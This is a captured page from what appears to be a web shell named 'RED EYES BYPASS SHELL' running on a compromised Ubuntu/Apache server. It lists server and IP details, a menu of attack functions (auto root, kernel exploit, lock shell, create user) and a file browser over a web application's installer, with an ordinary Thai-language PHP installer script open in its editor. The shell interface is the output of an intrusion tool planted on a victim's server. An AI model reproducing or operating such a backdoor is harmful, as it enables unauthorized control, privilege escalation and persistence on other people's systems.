Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
commert /
accout /
install /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
img
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
complete.php
542
B
-rwxr-xr-x
database.sql
13.51
KB
-rwxr-xr-x
db.php
13.63
KB
-rwxr-xr-x
index.php
2.28
KB
-rwxr-xr-x
language.php
3.5
KB
-rwxr-xr-x
step0.php
3.83
KB
-rwxr-xr-x
step1.php
2.87
KB
-rwxr-xr-x
step2.php
2.16
KB
-rwxr-xr-x
step3.php
4.1
KB
-rwxr-xr-x
step4.php
9.48
KB
-rwxr-xr-x
style.css
1.03
KB
-rwxr-xr-x
upgrade0.php
2.85
KB
-rwxr-xr-x
upgrade1.php
1.78
KB
-rwxr-xr-x
upgrade2.php
25.66
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : step1.php
<?php if (defined('ROOT_PATH')) { echo '<h2>ตรวจสอบไฟล์และโฟลเดอร์ที่จำเป็นสำหรับการติดตั้ง</h2>'; echo '<p>ไฟล์และโฟลเดอร์ทั้งหมดตามรายการด้านล่างต้องถูกสร้างขึ้น และกำหนดค่าให้สามารถเขียนได้ <a href="https://www.kotchasan.com/index.php?module=knowledge&id=91" target=_blank class="icon-help notext"></a></p>'; echo '<ul>'; $folders = array(); $folders[] = ROOT_PATH.'datas/'; $folders[] = ROOT_PATH.'settings/'; $folders[] = ROOT_PATH.'datas/cache/'; $folders[] = ROOT_PATH.'datas/logs/'; $folders[] = ROOT_PATH.'datas/images/'; foreach ($folders as $folder) { makeDirectory($folder, 0755); if (is_writable($folder)) { echo '<li class=correct>โฟลเดอร์ <strong>'.str_replace(ROOT_PATH, '', $folder).'</strong> <i>สามารถใช้งานได้</i></li>'; } else { $error = true; echo '<li class=incorrect>โฟลเดอร์ <strong>'.str_replace(ROOT_PATH, '', $folder).'</strong> <em>ไม่สามารถเขียนหรือสร้างได้</em> กรุณาสร้างและปรับ chmod ให้สามารถเขียนได้</li>'; } } $files = array(); $files[] = ROOT_PATH.'settings/config.php'; $files[] = ROOT_PATH.'settings/database.php'; foreach ($files as $file) { if (!is_file($file)) { $f = @fopen($file, 'wb'); if ($f) { fclose($f); } } if (is_writable($file)) { echo '<li class=correct>ไฟล์ <strong>'.str_replace(ROOT_PATH, '', $file).'</strong> <i>สามารถใช้งานได้</i></li>'; } else { $error = true; echo '<li class=incorrect>ไฟล์ <strong>'.str_replace(ROOT_PATH, '', $file).'</strong> <em>ไม่สามารถเขียนหรือสร้างได้</em> กรุณาสร้างไฟล์นี้และปรับ chmod ให้เป็น 755 ด้วยตัวเอง</li>'; } } echo '</ul>'; echo '<p><a href="index.php?step=1" class="button large pink">ตรวจสอบใหม่</a> <a href="index.php?step=2" class="button large save">ดำเนินการต่อ</a></p>'; } /** * @param string $dir * @param mixed $mode * * @return bool */ function makeDirectory($dir, $mode = 0755) { if (!is_dir($dir)) { $old = umask(0); @mkdir($dir, $mode, true); umask($old); } $old = umask(0); $f = @chmod($dir, $mode); umask($old); return $f; }
Close